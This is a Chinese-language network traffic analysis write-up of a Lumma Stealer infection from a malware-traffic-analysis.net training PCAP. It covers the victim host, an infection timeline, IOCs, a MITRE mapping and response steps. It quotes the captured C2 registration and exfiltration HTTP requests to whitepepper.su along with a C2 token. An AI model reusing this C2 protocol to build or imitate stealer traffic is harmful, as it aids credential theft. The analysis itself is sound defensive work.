fpesquivel/Analise-de-Trafego-de-Rede-Lumma-Stealer

**网络流量分析 — Lumma Stealer** **练习：** malware-traffic-analysis.net — 2026-01-31 **使用工具：** Wireshark **作者：** Felipe Esquivel ## 摘要 一台连接到 `win11office.com` 域的 Windows 工作站感染了 **Lumma Stealer**，这是一种旨在窃取凭据、会话 cookie 和浏览器数据的 infostealer 类型恶意软件。受感染的主机通过简单的 HTTP 在端口 80 上与 C2 服务器 `whitepepper.su`（IP `153.92.1.49`）建立了通信，并发送了系统指纹数据。随后，识别出与另外两个可疑域名的 HTTPS 连接，表明可能安装了第二阶段的恶意软件。 ## 环境 | 字段 | 值 | |---|---| | 本地网络 IP 范围 | 10.1.21.0/24 | | Active Directory 域 | win11office.com | | AD 环境名称 | WIN11OFFICE | | 域控制器 | 10.1.21.2 — WIN-LU4L24X3UB7 | | 网络网关 | 10.1.21.1 | ## 受害者详情 | 字段 | 值 | |---|---| | IP 地址 | 10.1.21.58 | | MAC 地址 | 00:21:5d:c8:0e:f2 | | 主机名 | DESKTOP-ES9F3ML | | Windows 用户 | gwyatt | | 用户全名 | Gabriel Wyatt | ### 如何在 Wireshark 中找到每项信息 - **受害者 IP** — 通过过滤发往 `153.92.1.49`（C2 的 IP）的流量进行识别，使用过滤器 `ip.addr == 153.92.1.49` - **主机名** — 使用 `nbns` 过滤器找到，通过观察 NetBIOS 名称注册数据包 - **MAC 地址** — 在应用 `nbns` 过滤器后，点击任何源自 `10.1.21.58` 的数据包，可在 `Ethernet II > Src` 字段中看到 - **用户** — 使用 `kerberos.CNameString` 过滤器找到，展开数据包详情并定位到 `CNameString: gwyatt` 字段 - **全名** — 通过 `Edit → Find Packet` 找到，在数据包详情中搜索字符串 `Wyatt`，在 LDAP/SAMR 流量中出现了 `Full Name: Gabriel Wyatt` 字段 ## 感染时间线 | 时间 (UTC) | 事件 | |---|---| | 23:04:03 | 开始捕获 — Windows 启动的正常流量 | | 23:04:49 | 访问 `media.megafilehub4.lat` — 可能是恶意软件的来源 | | 23:05:34 | 联系 `whooptm.cyou` — 可能是重定向器 | | 23:05:36 | **首次连接 `whitepepper.su`** — Lumma Stealer 活动开始 | | 23:05:39 | GET `/api/set_agent`（参数 `agent=Chrome`）— 在 C2 面板中注册受害者 | | 23:05:40 | POST `/api/set_agent?act=log` — 发送从 Chrome 窃取的数据（8.023 字节） | | 23:05:47 | GET `/api/set_agent`（参数 `agent=Edge`）— 收集 Edge 数据 | | 23:05:47 | POST `/api/set_agent?act=log` — 发送从 Edge 窃取的数据（7.975 字节） | | 23:06:06 | 与 `holiday-forever.cc` 建立 HTTPS 连接 — 第二阶段恶意软件 | | 23:06:10 | 与 `communicationfirewall-security.cc` 建立 HTTPS 连接 — 第二阶段恶意软件 | ## 恶意流量分析 ### Lumma Stealer — whitepepper.su Lumma Stealer 是一种在地下论坛作为 MaaS (Malware-as-a-Service) 出售的 infostealer。它会从 Chrome 和 Edge 等浏览器中窃取保存的凭据、cookie、历史记录以及加密货币钱包数据。 观察到的通信流程遵循了该恶意软件的经典模式： **1. 在 C2 面板中注册受害者：** ``` GET /api/set_agent?id=3BF67EC05320C5729578BE4C0ADF174C &token=842e2802df0f0a06b4ed51f12f4387e761523b &description= &agent=Chrome Host: whitepepper.su ``` 每个字段都有特定的功能： | 字段 | 值 | 含义 | |---|---|---| | `id` | `3BF67EC05320C5729578BE4C0ADF174C` | 受感染机器的唯一标识符 | | `token` | `842e2802...` | 受害者在 C2 面板的身份验证 token | | `description` | (空) | 留空的标签字段 | | `agent` | `Chrome` / `Edge` | 正在被收集数据的浏览器 | **2. 窃取数据外发：** ``` POST /api/set_agent?...&act=log Content-Type: application/x-www-form-urlencoded Content-Length: 8023 ``` 恶意软件重复了这个循环两次 — 一次针对 Chrome，一次针对 Edge — 分别向 C2 服务器发送了 8.023 和 7.975 字节的窃取数据。 **感染之前的可疑域名：** 在与 `whitepepper.su` 通信之前，主机访问了 `media.megafilehub4.lat` — 这是一个使用 `.lat` 顶级域名的域名，与任何已知的合法服务无关，很可能是恶意软件的传播载体。 ### 第二阶段恶意软件 — .cc 域名 通过 Lumma Stealer 进行外发后，主机与另外两个域名建立了 HTTPS 连接： | 域名 | IP | 端口 | |---|---|---| | `holiday-forever.cc` | 80.97.160.24 | 443 | | `communicationfirewall-security.cc` | 104.21.9.36 | 443 | `.cc`（科科斯群岛）顶级域名经常被威胁行为者滥用。`communicationfirewall-security.cc` 这个名称试图模仿合法的安全服务 — 这是一种被称为 **typosquatting/伪装名称** 的技术。这些域名表明安装了第二阶段的 payload，可能是 RAT 或其他 stealer。 ## 攻陷指标 (IOC) | 类型 | 值 | 上下文 | |---|---|---| | IP | `153.92.1.49` | Lumma Stealer 的 C2 服务器 | | 域名 | `whitepepper.su` | 主要 C2 — Lumma Stealer 面板 | | URL | `http://whitepepper.su/api/set_agent` | 注册和数据外发 endpoint | | 域名 | `holiday-forever.cc` | 第二阶段恶意软件 (阶段 2) | | 域名 | `communicationfirewall-security.cc` | 第二阶段恶意软件 (阶段 2) | | 域名 | `media.megafilehub4.lat` | 可能的传播载体 | | 域名 | `whooptm.cyou` | 可能的重定向器 | | 受害者 ID | `3BF67EC05320C5729578BE4C0ADF174C` | C2 面板中的唯一标识符 | | Token | `842e2802df0f0a06b4ed51f12f4387e761523b` | C2 身份验证 token | ## MITRE ATT&CK 映射 | 技术 | ID | 证据 | |---|---|---| | 浏览器凭据 | T1555.003 | Chrome 和 Edge 的数据被发送至 C2 | | 通过 Web 协议外发 | T1041 | 窃取的数据通过 HTTP POST 发送 | | 应用层协议 — Web | T1071.001 | C2 通过端口 80 上的 HTTP 运行 | | 伪装名称 | T1036 | `communicationfirewall-security.cc` 模仿合法服务 | | 恶意软件即服务 | T1588 | Lumma Stealer 作为 MaaS 出售 | | 收集系统数据 | T1082 | 通过 `/api/set_agent` 进行机器指纹识别 | ## 未观察到的活动 - 没有通过 SMB 进行的横向移动 — 感染似乎仅限于主机 `10.1.21.58` - 除了域控制器（正常的 AD 流量）之外，没有与任何其他内部主机的通信 - 仅通过网络抓包无法确切的传播载体（网络钓鱼电子邮件、drive-by 下载） ## 事件响应建议 1. **立即隔离** 网络中的主机 `DESKTOP-ES9F3ML` (10.1.21.58) 2. **在防火墙上阻止** IOC 表中列出的 IP 和域名 3. **强制重置** 用户 `gwyatt` (Gabriel Wyatt) 的密码，并撤销活跃会话 4. **假定完全泄露** 该用户在 Chrome 和 Edge 浏览器中保存的所有凭据 — 通知相应的服务 5. **调查代理/DNS 日志中的 `media.megafilehub4.lat`**，以识别可能访问过同一域名的其他主机 6. **对主机进行取证筛查**，以识别通过 `holiday-forever.cc` 和 `communicationfirewall-security.cc` 安装的第二阶段 payload 7. **检查域控制器日志**，查找与 `gwyatt` 账户相关的异常活动 ## 使用工具 | 工具 | 用途 | |---|---| | Wireshark | PCAP 的主要分析 | | VirusTotal | 检查 IP 和域名的信誉 | | AbuseIPDB | 社区滥用报告 | | ipinfo.io | 识别 IP 的 ASN 和地理位置 | ## 参考资料 - 原始练习：https://www.malware-traffic-analysis.net/2026/01/31/index.html - Lumma Stealer — 流量模式文档：https://www.malware-traffic-analysis.net/2026/01/01/index.html - ISC SANS Diary: https://isc.sans.edu/diary/32628/

标签：AMSI绕过, DAST, Wireshark, 句柄查看, 域渗透, 威胁检测, 恶意软件分析, 插件系统, 电子数据取证, 网络安全, 隐私保护